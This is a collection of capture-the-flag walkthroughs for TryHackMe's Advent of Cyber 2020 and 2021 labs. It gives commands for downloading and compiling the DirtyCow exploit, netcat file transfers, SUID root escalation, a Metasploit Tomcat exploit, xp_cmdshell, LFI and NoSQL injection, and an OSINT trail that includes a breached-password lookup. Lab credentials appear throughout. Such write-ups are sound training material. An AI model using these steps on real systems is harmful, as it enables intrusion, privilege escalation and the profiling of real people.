19 | - `smbclient ///`
20 | - `tbfc-santa`
21 |
22 | - Log in to this share, what directory did ElfMcSkidy leave for Santa?
23 |
24 | - `jingle-tunes`
25 |
26 |
27 |
28 | ### see you ...
29 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-10-Dont-be-sElfish/note_from_mcskidy.txt:
--------------------------------------------------------------------------------
1 | Hi Santa, I decided to put all of your favourite jingles onto this share - allowing you access it from anywhere you like! Regards ~ ElfMcSkidy
2 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-11-The_Rogue_Gnome/README.md:
--------------------------------------------------------------------------------
1 | # The Rogue Gnome
2 |
3 | Before we begin, we're going to need to deploy two Instances:
4 |
5 | 1. The THM AttackBox by pressing the "Start AttackBox" button at the top-right of the page.
6 | 2. The vulnerable Instance attached to this task by pressing the "Deploy" button at the top-right of this task/day.
7 |
8 | - What type of privilege escalation involves using a user account to execute commands as an administrator?
9 |
10 | - `vertical`
11 |
12 | - What is the name of the file that contains a list of users who are a part of the sudo group?
13 |
14 |
15 | - `sudoers`
16 |
17 | - Use SSH to log in to the vulnerable machine like so: ssh cmnatic@MACHINE_IP
18 | Input the following password when prompted: aoc2020
19 |
20 | no answer needed
21 |
22 | - Enumerate the machine for executables that have had the SUID permission set. Look at the output and use a mixture of GTFObins and your researching skills to learn how to exploit this binary.
23 | You may find uploading some of the enumeration scripts that were used during today's task to be useful.
24 |
25 | no answer needed
26 |
27 | - On your machine `wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh`
28 | - `nc -lvnp 4444 < linEnum.sh`
29 | - On target `nc -w 3 4444 > linEnum.sh`
30 | - On target `chmod +x && ./linEnum.sh`
31 | - We can see there is `/bin/bash`. Good.
32 | - This could be done also with `find / -perm -u=s -type f 2>/dev/null`
33 | - On target `bash -p`
34 | - `cat /root/flag.txt`
35 |
36 | - Use this executable to launch a system shell as root.
37 | What are the contents of the file located at /root/flag.txt?
38 |
39 | - `thm{*****************}`
40 |
41 |
42 |
43 |
44 |
45 | ## see you ...
46 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-12-Ready,_set,_elf./README.md:
--------------------------------------------------------------------------------
1 | # Ready, set, elf.
2 |
3 |
4 | - What is the version number of the web server?
5 |
6 | - `nmap -sV ` (Remember, if it says "host seems down", use `-Pn`, look for what it means)
7 | - `9.0.17`
8 |
9 | - What CVE can be used to create a Meterpreter entry onto the machine? (Format: CVE-XXXX-XXXX)
10 |
11 | - `msfconsole`
12 | - `search tomcat 9`
13 | - It outputs `exploit/windows/http/tomcat_cgi_cmdlineargs 2019-04-10`. googling then...
14 | - `CVE-2019-0232`
15 |
16 | - Set your Metasploit settings appropriately and gain a foothold onto the deployed machine.
17 |
18 | no answer needed
19 |
20 | - after search, It should outputs only one exploit, anyway use `use 0` if the output is only one, or the appropriate number
21 | - `set RHOSTS `
22 | - `set RPORT 8080`
23 | - `set LHOST `
24 | - `set targeturi /cgi-bin/elfwhacker.bat`
25 | - `run` or `exploit`
26 |
27 | - What are the contents of flag1.txt?
28 |
29 | - `cat flag1.txt`
30 | - `thm{********_***_***_*****}`
31 |
32 | - Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!
33 |
34 | no answer needed
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-13-Coal_for_Christmas/README.md:
--------------------------------------------------------------------------------
1 | # Coal for Christmas
2 |
3 | - Hi Santa, hop in your sleigh and deploy this machine!
4 |
5 | no answer needed
6 |
7 | - nmap
8 |
9 | no answer needed
10 |
11 | - `nmap `
12 |
13 | - What old, deprecated protocol and service is running?
14 |
15 | - `telnet`
16 |
17 | - What credential was left for you?
18 |
19 | - `telnet 23`
20 | - `clauschristmas`
21 |
22 | - What distribution of Linux and version number is this server running?
23 |
24 | - `uname -a`
25 | - `Ubuntu 12.04`
26 |
27 | - Who got here first?
28 |
29 | - `cat cookies_and_milk.txt`
30 | - `grinch`
31 |
32 | - This cookies_and_milk.txt file looks like a modified rendition of a DirtyCow exploit, usually written in C. Find a copy of that original file online, and get it on the target box. You can do this with some simple file transfer methods like netcat, or spinning up a quick Python HTTP server... or you can simply copy-and-paste it into a text editor on the box!
33 |
34 | no answer needed
35 |
36 | - [dirtycow](https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c)
37 | - On your machine `nc -lnvp 4444 < dirty.c`
38 | - On target `nc -w 3 4444 > dirty.c`
39 |
40 | - What is the verbatim syntax you can use to compile, taken from the real C source code comments?
41 |
42 | - `gcc -pthread dirty.c -o dirty -lcrypt`
43 |
44 | - Run the commands to compile the exploit, and run it.
45 | What "new" username was created, with the default operations of the real C source code?
46 |
47 | - `./dirty` and then enter the password you've chosen
48 | - `firefart`
49 |
50 | - What is the MD5 hash output?
51 |
52 | - `cat message_from_the_grinch.txt`
53 | - `touch coal`
54 | - `tree | md5sum`
55 | - `********************************`
56 |
57 |
58 |
59 |
60 | ### see you ...
61 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-14-Where's Rudolph?/README.md:
--------------------------------------------------------------------------------
1 | # Where's Rudolph?
2 |
3 | - What URL will take me directly to Rudolph's Reddit comment history?
4 |
5 | - Google is your best friend. `https://www.reddit.com/user/IGuidetheClaus2020/comments/`
6 |
7 | - According to Rudolph, where was he born?
8 |
9 | - `Chicago`
10 |
11 | - Rudolph mentions Robert. Can you use Google to tell me Robert's last name?
12 |
13 | - Google is your friend.. `May`
14 |
15 | - On what other social media platform might Rudolph have an account?
16 |
17 | - Twitter Search
18 | - `https://twitter.com/IGuideClaus2020`
19 | - `twitter`
20 |
21 | - What is Rudolph's username on that platform?
22 |
23 | - `IGuideClaus2020`
24 |
25 | - What appears to be Rudolph's favorite TV show right now?
26 |
27 | - `bachelorette`, by twitter feed.
28 |
29 | - Based on Rudolph's post history, he took part in a parade. Where did the parade take place?
30 |
31 | - `Chicago`
32 |
33 | - Okay, you found the city, but where specifically was one of the photos taken?
34 |
35 | - [photo with higher resolution](https://twitter.com/IGuideClaus2020/status/1331615839318138883)
36 | - Upload on [exif.regex.info](http://exif.regex.info)
37 | - `41.891815, -87.624277`
38 |
39 | - Did you find a flag too?
40 |
41 | - `{FLAG}**********************`
42 |
43 | - Has Rudolph been pwned? What password of his appeared in a breach?
44 |
45 | - [Scylla Search](https://scylla.sh/api)
46 | - The email is shown on Twitter `rudolphthered@hotmail.com`.
47 | - `*******`
48 |
49 | - Based on all the information gathered. It's likely that Rudolph is in the Windy City and is staying in a hotel on Magnificent Mile. What are the street numbers of the hotel address?
50 |
51 | - `41.891815, -87.624277` on Google Maps
52 | - `Chicago Marriott Downtown` on Google Search
53 | - `540`
54 |
55 |
56 |
57 |
58 | ### see you ...
59 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-14-Where's Rudolph?/twitter.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-14-Where's Rudolph?/twitter.jpeg
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-14-Where's Rudolph?/twitterHR.jpeg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-14-Where's Rudolph?/twitterHR.jpeg
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-15-There's a Python in my stocking!/README.md:
--------------------------------------------------------------------------------
1 | # There's a Python in my stocking!
2 |
3 | - What's the output of True + True?
4 |
5 | - `2`
6 |
7 | - What's the database for installing other peoples libraries called?
8 |
9 | - `PyPi`
10 |
11 | - What is the output of bool("False")?
12 |
13 | - `True`
14 |
15 | - What library lets us download the HTML of a webpage?
16 |
17 | - `requests`
18 |
19 | - What is the output of the program provided in "Code to analyse for Question 5" in today's material?
20 | (This code is located above the Christmas banner and below the links in the main body of this task)
21 |
22 | - `[1, 2, 3, 6]`
23 |
24 | - What causes the previous task to output that?
25 |
26 | - `pass by reference`
27 |
28 |
29 |
30 |
31 | ### see you ...
32 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-16-Help! Where is Santa?/README.md:
--------------------------------------------------------------------------------
1 | # Help! Where is Santa?
2 |
3 | Oh no! Santa 🎅 has taken off, leaving you -- the faithful elves behind! Can you help find Santa's location?
4 |
5 | Santa has a webpage at `/static/index.html`
6 |
7 | - What is the port number for the web server?
8 |
9 | - `nmap -p -10000 `
10 | - `8000`
11 |
12 | - What is the directory for the API, without the API key?
13 |
14 | - Visit `http://:8000/` and inspect code
15 | - `/api/`
16 |
17 | - Where is Santa right now?
18 |
19 | - Change the `TARGET_API` in `api_fuzzer.py`
20 | - `python3 api_fuzzer.py`
21 | - `Winter Wonderland, Hyde Park, London`
22 |
23 | - Find out the correct API key. Remember, this is an odd number between 0-100. After too many attempts, Santa's Sled will block you.
24 | To unblock yourself, simply terminate and re-deploy the target instance ()
25 |
26 | - `57`
27 |
28 |
29 |
30 |
31 | ### see you ...
32 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-16-Help! Where is Santa?/api_fuzzer.py:
--------------------------------------------------------------------------------
1 | import requests
2 |
3 | TARGET_API = "HERE YOUR TARGET_IP"
4 |
5 | for i in range(0, 100):
6 | if i %2 == 1:
7 | response = requests.get('http://' + TARGET_API + ':8000/api/{}'.format(str(i)))
8 | print(str(i) + " : " + str(response.status_code))
9 | print(response.text)
10 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-17-ReverseELFneering/README.md:
--------------------------------------------------------------------------------
1 | # ReverseELFneering
2 |
3 | Username: elfmceager
4 |
5 | Password: adventofcyber
6 |
7 | Use your new-found knowledge of Radare2 to analyse the "challenge1" file in the Instance that is attached to this task to answer the questions below.
8 |
9 | Connect by ssh to the target.
10 |
11 | - ssh elfmceager@, type `yes` and enter the password `adventofcyber`.
12 |
13 | - What is the value of local_ch when its corresponding movl instruction is called (first if multiple)?
14 |
15 | - `./file1`
16 | - `r2 -d ./file1`
17 | - Inside r2> `aa`
18 | - `afl | grep main`
19 | - `pdf @maini`
20 | - `1`
21 |
22 | - What is the value of eax when the imull instruction is called?
23 |
24 | - `db 0x00400b55`
25 | - `pdf @main`
26 | - `dc`
27 | - `px @rbp-0xc`
28 | - `ds`
29 | - `px @rbp-0xc`
30 | - `dr`
31 | - `ds`
32 | - `dr`
33 | - `6`
34 |
35 | - What is the value of local_4h before eax is set to 0?
36 |
37 | - Play with breakpoints and registers
38 | - `6`
39 |
40 |
41 |
42 |
43 | ### see you ...
44 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-17-ReverseELFneering/r2_cs.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-17-ReverseELFneering/r2_cs.pdf
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-18-The_Bits_of_Christmas/README.md:
--------------------------------------------------------------------------------
1 | # The Bits of Christmas
2 |
3 |
4 | Username: `cmnatic`
5 |
6 | Password: `Adventofcyber!`
7 |
8 |
9 | - Open the "TBFC_APP" application in ILspy and begin decompiling the code
10 |
11 | - Open `Remmina` on your machine or download it with `sudo apt install remmina`
12 | - Start Remmina, enter the IP, the username and password.
13 | - Open ILSpy, click `File` and open `TBFC_APP`
14 |
15 | - What is Santa's password?
16 |
17 | - In the root folder we see there are a lot of contents. Functions, libraries, main. Then we find a folder called `CrackMe`. Inside that folder there is the Main form code. If you analyze all the code when the button `Sumbit password` is pressed it calls the function `buttonActivate_Click`... mmmh. Let's take a look.
18 | - The first function called is reference to a Module that include this `internal static $ArrayType$$$BY0BB@$$CBD ??_C@_0BB@IKKDFEPG@****************@/* Not supported: data(** ** ** ** ** ** ** ** ** ** ** ** ** ** ** ** **) */;`. :)
19 | - `*************`
20 |
21 | - Now that you've retrieved this password, try to login...What is the flag?
22 |
23 | - `***{*****}`
24 |
25 |
26 |
27 |
28 | ### see you ...
29 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-19-The_Naughty_or_Nice_List/list.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-19-The_Naughty_or_Nice_List/list.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-20-PowershELlF_to_the_rescue/README.md:
--------------------------------------------------------------------------------
1 | # PowershELlF to the rescue
2 |
3 | - Search for the first hidden elf file within the Documents folder. Read the contents of this file. What does Elf 1 want?
4 |
5 | - `ssh -l mceager `
6 | - Enter the password `r0ckStar!`
7 | - `powershell` and wait until you see a new terminal
8 | - `Set-Location ./Documents/`
9 | - `Get-ChildItem -File`
10 | - `Get-ChildItem -File -Hidden`
11 | - Notice there is a hidden file `e1fone.txt` and a visible `elfone.txt`.
12 | - `Get-Content elfone.txt`
13 | - `Get-Content e1fone.txt`
14 | - `2 front teeth`
15 |
16 | - Search on the desktop for a hidden folder that contains the file for Elf 2. Read the contents of this file. What is the name of that movie that Elf 2 wants?
17 | - `cd ..`
18 | - `Set-Location Desktop`
19 | - `Get-Content -File -Hidden`
20 | - `Set-Location .\elf2wo\`
21 | - `Get-Content .\e70smsW10Y4k.txt`
22 | - `Scrooged`
23 |
24 | - Search the Windows directory for a hidden folder that contains files for Elf 3. What is the name of the hidden folder? (This command will take a while)
25 |
26 | - `Set-Location C:\Windows`
27 | - `Get-ChildItem -Filter "*3*" -Recurse -Directory -Hidden -ErrorAction SilentlyContinue`
28 | - `Set-Location .\System32\3lfthr3e\`
29 | - `3lfthr3e`
30 |
31 | - How many words does the first file contain?
32 |
33 | - `Get-Content 1.txt | Measure-Object -Word`
34 | - `9999`
35 |
36 | - What 2 words are at index 551 and 6991 in the first file?
37 |
38 | - `(Get-Content .\1.txt)[551]`
39 | - `(Get-Content .\1.txt)[6991]` or `Get-Content 1.txt | Select-Object -Index 551,6991`
40 | - `Red Ryder`
41 |
42 | - This is only half the answer. Search in the 2nd file for the phrase from the previous question to get the full answer. What does Elf 3 want? (use spaces when submitting the answer)
43 |
44 | - `Get-Content 2.txt | Select-String -Pattern "redryder"`
45 | - `Red Ryder bb gun`
46 |
47 |
48 |
49 |
50 | ### see you ...
51 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-21-Time_for_some_ELForensics/README.md:
--------------------------------------------------------------------------------
1 | # Time for some ELForensics
2 |
3 | User name: `littlehelper`
4 | User password: `iLove5now!`
5 |
6 | Open Remmina and connect yourself to the remote machine.
7 |
8 | - Read the contents of the text file within the Documents folder. What is the file hash for db.exe?
9 |
10 | - Open PowerShell in remote machine
11 | - `Set-Location Documents`
12 | - `Get-ChildItem`
13 | - `Get-Content '.\db file hash.txt'`
14 | - `********************856E6A78E3A1`
15 |
16 | - What is the file hash of the mysterious executable within the Documents folder?
17 |
18 | - `Get-FileHash -Algorithm MD5 deebee.exe`
19 | - `********************6EB12AED09F0`
20 |
21 | - Using Strings find the hidden flag within the executable?
22 |
23 | - `C:\Tools\strings64.exe -accepteula deebee.exe`
24 | - Read carefully the output
25 | - `THM{*******************************}`
26 |
27 | - What is the flag that is displayed when you run the database connector file?
28 |
29 | - `Get-Item -Path .\deebee.exe -Stream *`
30 | - `wmic process call create $(Resolve-Path .\deebee.exe:hidedb)`
31 | - `THM{*******************************}`
32 |
33 |
34 |
35 | ### see you ...
36 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-23-The_Grinch_strikes_again!/README.md:
--------------------------------------------------------------------------------
1 | # The Grinch strikes again!
2 |
3 | 
4 |
5 | Use Remmina to connect to the target machine as the documentation in the [proper page](https://tryhackme.com/room/adventofcyber2) tells you.
6 |
7 | - User name: `administrator`
8 | - User password: `sn0wF!akes!!!`
9 |
10 |
11 | - Decrypt the fake 'bitcoin address' within the ransom note. What is the plain text value?
12 |
13 | - `echo -n "bm9tb3J************pdmFsY29tcGFueQ==" | base64 -d`
14 | - `nomore******************`
15 |
16 | - At times ransomware changes the file extensions of the encrypted files. What is the file extension for each of the encrypted files?
17 |
18 | - `.grinch`
19 |
20 | - What is the name of the suspicious scheduled task?
21 |
22 | - `opidsfsdf`
23 |
24 | - Inspect the properties of the scheduled task. What is the location of the executable that is run at login?
25 |
26 | - `C:\Users\Administrator\Desktop\oidsfsdf.exe`
27 |
28 | - There is another scheduled task that is related to VSS. What is the ShadowCopyVolume ID?
29 |
30 | - `7a9eea15-000-0000-0000-010000000000`
31 |
32 | - Assign the hidden partition a letter. What is the name of the hidden folder?
33 |
34 | - `confidential`
35 |
36 | - Right-click and inspect the properties for the hidden folder. Use the 'Previous Versions' tab to restore the encrypted file that is within this hidden folder to the previous version. What is the password within the file?
37 |
38 | - `*********************`
39 |
40 |
41 |
42 | # see you ...
43 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/Day-23-The_Grinch_strikes_again!/win-ransomware.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/Day-23-The_Grinch_strikes_again!/win-ransomware.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/README.md:
--------------------------------------------------------------------------------
1 | # Advent of Cyber 2020 🎄🎅
2 |
3 | ## [tryhackme.com/edoardottt](https://tryhackme.com/p/edoardottt)
4 |
5 | 
6 |
7 | These are all the things I have produced during my Advent of Cyber 2020. I hope you will have fun as I had completing this AoC.
8 |
9 | Please, before emailing me, be sure you've read all the introduction part above the questions; really it's a good source to learn new things.
10 |
11 | 
12 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/advent.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/advent.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2020/thm-certificate.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2020/thm-certificate.png
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-01-Save_The_Gifts/README.md:
--------------------------------------------------------------------------------
1 | # Day 1 - Save the gifts
2 |
3 | The trick is to change the user id until you find the correct one.
4 |
5 | - After finding Santa's account, what is their position in the company?
6 |
7 | - `*********`
8 |
9 | - After finding McStocker's account, what is their position in the company?
10 |
11 | - `*************`
12 |
13 | - After finding the account responsible for tampering, what is their position in the company?
14 |
15 | - `***************`
16 |
17 | - What is the received flag when McSkidy fixes the Inventory Management System?
18 |
19 | - `THM{*****************}`
20 |
21 | - If you want to learn more about IDOR vulnerabilities, we suggest trying out this room https://tryhackme.com/room/idor
22 |
23 | No answer needed
24 |
25 | - Tasks released each day get progressively harder (but are still guided with walkthrough videos). Come back tomorrow for Day 2's task!
26 |
27 | No answer needed
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-02-Elf_HR_Problems/README.md:
--------------------------------------------------------------------------------
1 | # Day 2 Elf HR Problems
2 |
3 | - Open the static site in a new tab, here.
4 |
5 | no answer needed
6 |
7 | - Register an account, and verify the cookies using the Developer Tools in your browser.
8 |
9 | - What is the name of the new cookie that was created for your account?
10 |
11 | - Go in the developer tools using F12 and then look at the application tab, then under cookies you will find the cookies.
12 | - `*********`
13 |
14 | - What encoding type was used for the cookie value?
15 |
16 | - Go to [CyberChef](https://gchq.github.io/CyberChef/), insert the cookie value as input and insert magic as recipe.
17 | - `***********`
18 |
19 |
20 | - What object format is the data of the cookie stored in?
21 |
22 | - `***n`
23 |
24 | - Manipulate the cookie and bypass the login portal.
25 |
26 | - What is the value of the administrator cookie? (username = admin)
27 |
28 | - Just go on CyberChef and do the inverse, change the user from yours to 'admin' and compute "To Hex".
29 | - `******************...***************`
30 |
31 | - What team environment is not responding?
32 |
33 | - `**`
34 |
35 | - What team environment has a network warning?
36 |
37 | - `**********`
38 |
39 | - If you want to learn more about Authentication bypasses, we suggest trying out this room https://tryhackme.com/jr/authenticationbypass
40 |
41 | No answer needed
42 |
43 | Tasks released each day get progressively harder (but are still guided with walkthrough videos). Come back tomorrow for Day 3's task, where InsiderPHD will be recording a video walkthrough!
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-03-Christmas_Blackout/README.md:
--------------------------------------------------------------------------------
1 | # Day 3 - Christmas Blackout
2 |
3 |
4 | - Using a common wordlist for discovering content, enumerate http://MACHINE_IP to find the location of the administrator dashboard. What is the name of the folder?
5 |
6 | - `*****`
7 |
8 |
9 | - In your web browser, try some default credentials on the newly discovered login form for the "administrator" user. What is the password?
10 |
11 | - `***************`
12 |
13 |
14 | - Access the admin panel. What is the value of the flag?
15 |
16 | - `********************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-04-Santas_Running_Behind/README.md:
--------------------------------------------------------------------------------
1 | # Day 4 - Santa's Running Behind
2 |
3 |
4 |
5 | - Access the login form at http://MACHINE_IP
6 |
7 | No answer needed
8 |
9 | - Configure Burp Suite & Firefox, submit some dummy credentials and intercept the request. Use intruder to attack the login form.
10 |
11 | No answer needed
12 |
13 | What valid password can you use to access the "santa" account?
14 |
15 | - `******`
16 |
17 | - What is the flag in Santa's itinerary?
18 |
19 | - `***************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-05-Pesky_Elf_Forum/README.md:
--------------------------------------------------------------------------------
1 | # Day 5 - Pesky Elf Forum
2 |
3 |
4 | - What flag did you get when you disabled the plugin?
5 |
6 | - `*****************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-06-Patch_Management_Is_Hard/README.md:
--------------------------------------------------------------------------------
1 | # Day 6 - Patch Management Is Hard
2 |
3 | - Deploy the attached VM and look around. What is the entry point for our web application?
4 |
5 | - `err`
6 |
7 | - Use the entry point to perform LFI to read the /etc/flag file. What is the flag?
8 |
9 | - `***************************`
10 |
11 | - Use the PHP filter technique to read the source code of the index.php. What is the $flag variable's value?
12 |
13 | - `***************************`
14 |
15 | McSkidy forgot his login credential. Can you help him to login in order to recover one of the server's passwords?
16 | Now that you read the index.php, there is a login credential PHP file's path. Use the PHP filter technique to read its content. What are the username and password?
17 |
18 | - `MCSkidy:**********`
19 |
20 | - Use the credentials to login into the web application. Help McSkidy to recover the server's password. What is the password of the flag.thm.aoc server?
21 |
22 | - `**************************`
23 |
24 | - The web application logs all users' requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.
25 |
26 | - `**************************************`
27 |
28 | - Bonus: The current PHP configuration stores the PHP session files in /tmp. Use the LFI to call the PHP session file to get your PHP code executed.
29 |
30 | No answer needed
31 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-07-Migration_Without_Security/README.md:
--------------------------------------------------------------------------------
1 | # Day 7 - Migration Without Security
2 |
3 | - Interact with the MongoDB server to find the flag. What is the flag?
4 |
5 | - `***{********************************}`
6 |
7 | We discussed how to bypass login pages as an admin. Can you log into the application that Grinch Enterprise controls as admin and retrieve the flag?
8 |
9 | Use the knowledge given in AoC3 day 4 to setup and run Burp Suite proxy to intercept the HTTP request for the login page. Then modify the POST parameter.
10 |
11 | - `***{********************************}`
12 |
13 | - Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag?
14 |
15 | - `***{********************************}`
16 |
17 | - Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record?
18 |
19 | - `*************************************`
20 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-09-Where_Is_All_This_Data_Going/AoC3.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/edoardottt/tryhackme-ctf/c5850cb9bf831aebdbb74999d27b77ffae7fe845/Advent-of-Cyber-2021/Day-09-Where_Is_All_This_Data_Going/AoC3.pcap
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-09-Where_Is_All_This_Data_Going/README.md:
--------------------------------------------------------------------------------
1 | # Day 9 - Where Is All This Data Going
2 |
3 | - In the HTTP #1 - GET requests section, which directory is found on the web server?
4 |
5 | - `*****`
6 |
7 | - What is the username and password used in the login page in the HTTP #2 - POST section?
8 |
9 | - `*******************`
10 |
11 | - What is the User-Agent's name that has been sent in HTTP #2 - POST section?
12 |
13 | - `***************************************`
14 |
15 | - In the DNS section, there is a TXT DNS query. What is the flag in the message of that DNS query?
16 |
17 | - `*******************************`
18 |
19 | - In the FTP section, what is the FTP login password?
20 |
21 | - `**********`
22 |
23 | - In the FTP section, what is the FTP command used to upload the secret.txt file?
24 |
25 | - `****`
26 |
27 | - In the FTP section, what is the content of the secret.txt file?
28 |
29 | - `*********`
30 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-10-Offensive_Is_The_Best_Defence/README.md:
--------------------------------------------------------------------------------
1 | # Day10 - Offensive Is The Best Defence
2 |
3 | - Help McSkidy and run nmap -sT MACHINE_IP. How many ports are open between 1 and 100?
4 |
5 | - `*`
6 |
7 | - What is the smallest port number that is open?
8 |
9 | - `**`
10 |
11 | - What is the service related to the highest port number you found in the first question?
12 |
13 | - `****`
14 |
15 | - Now run nmap -sS MACHINE_IP. Did you get the same results? (Y/N)
16 |
17 | - `*`
18 |
19 | - If you want Nmap to detect the version info of the services installed, you can use nmap -sV MACHINE_IP. What is the version number of the web server?
20 |
21 | - `*****************`
22 |
23 | - By checking the vulnerabilities related to the installed web server, you learn that there is a critical vulnerability that allows path traversal and remote code execution. Now you can tell McSkidy that Grinch Enterprises used this vulnerability. What is the CVE number of the vulnerability that was solved in version 2.4.51?
24 |
25 | - `**************`
26 |
27 | - You are putting the pieces together and have a good idea of how your web server was exploited. McSkidy is suspicious that the attacker might have installed a backdoor. She asks you to check if there is some service listening on an uncommon port, i.e. outside the 1000 common ports that Nmap scans by default. She explains that adding -p1-65535 or -p- will scan all 65,535 TCP ports instead of only scanning the 1000 most common ports. What is the port number that appeared in the results now?
28 |
29 | - `*****`
30 |
31 | - What is the name of the program listening on the newly discovered port?
32 |
33 | - `*******`
34 |
35 | If you would like to learn more about the topics covered in today’s tasks, we recommend checking out the Network Security module.
36 |
37 | No answer needed
38 |
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-11-Where_Are_The_Reindeers/README.md:
--------------------------------------------------------------------------------
1 | # Day 11 - Where Are The Reindeers?
2 |
3 | - There is an open port related to MS SQL Server accessible over the network. What is the port number?
4 |
5 | - `nmap -Pn `
6 | - `****`
7 |
8 | - If the connection is successful, you will get a prompt. What is the prompt that you have received?
9 |
10 | - `sqsh -S -U sa -P t7uLKzddQzVjVFJp`
11 | - `**`
12 |
13 | - We can see four columns in the table displayed above: id, first (name), last (name), and nickname. What is the first name of the reindeer of id 9?
14 |
15 | - `*******`
16 |
17 | - Check the table schedule. What is the destination of the trip scheduled on December 7?
18 |
19 | - `select * from reindeer.dbo.schedule;`
20 | - `******`
21 |
22 | - Check the table presents. What is the quantity available for the present “Power Bank”?
23 |
24 | - `select * from reindeer.dbo.presents;`
25 | - `*****`
26 |
27 | - There is a flag hidden in the grinch user's home directory. What are its contents?
28 |
29 | - `xp_cmdshell 'dir C:\Users\grinch';`
30 | - `xp_cmdshell 'dir C:\Users\grinch\Documents';`
31 | - `xp_cmdshell 'type C:\Users\grinch\Documents\flag.txt';`
32 | - `***************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-12-Sharing_Without_Caring/README.md:
--------------------------------------------------------------------------------
1 | Day12 - Sharing Without Caring
2 |
3 | - Scan the target server with the IP 10.10.112.197. Remember that MS Windows hosts block pings by default, so we need to add -Pn, for example, nmap -Pn 10.10.112.197 for the scan to work correctly. How many TCP ports are open?
4 |
5 | - `*`
6 |
7 | - In the scan results you received earlier, you should be able to spot NFS or mountd, depending on whether you used the -sV option with Nmap or not. Which port is detected by Nmap as NFS or using the mountd service?
8 |
9 | - `****`
10 |
11 | - How many shares did you find?
12 |
13 | - `*`
14 |
15 | - How many shares show “everyone”?
16 |
17 | - `*`
18 |
19 | - What is the title of file 2680-0.txt?
20 |
21 | - `***********`
22 |
23 | - It seems that Grinch Enterprises has forgotten their SSH keys on our system. One of the shares contains a private key used for SSH authentication (id_rsa). What is the name of the share?
24 |
25 | - `************`
26 |
27 | - We can calculate the MD5 sum of a file using md5sum FILENAME. What is the MD5 sum of id_rsa?
28 |
29 | - `*******************************`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-13-They_Lost_The_Plan/README.md:
--------------------------------------------------------------------------------
1 | # Day 13 - They Lost The Plan!
2 |
3 |
4 | - Complete the username: p.....
5 |
6 | - `*****`
7 |
8 | - What is the OS version?
9 |
10 | - `**********************`
11 |
12 | - What backup service did you find running on the system?
13 |
14 | - `***********`
15 |
16 | - What is the path of the executable for the backup service you have identified?
17 |
18 | - `**************************************************`
19 |
20 | - Run the whoami command on the connection you have received on your attacking machine. What user do you have?
21 |
22 | - `**********************`
23 |
24 | - What is the content of the flag.txt file?
25 |
26 | - `************`
27 |
28 | - The Grinch forgot to delete a file where he kept notes about his schedule! Where can we find him at 5:30?
29 |
30 | - `**********`
--------------------------------------------------------------------------------
/Advent-of-Cyber-2021/Day-14-Dev(Insecure)Ops/README.md:
--------------------------------------------------------------------------------
1 | Day 14 - Dev(Insecure)Ops
2 |
3 |
4 | - How many pages did the dirb scan find with its default wordlist?
5 |
6 | - `*`
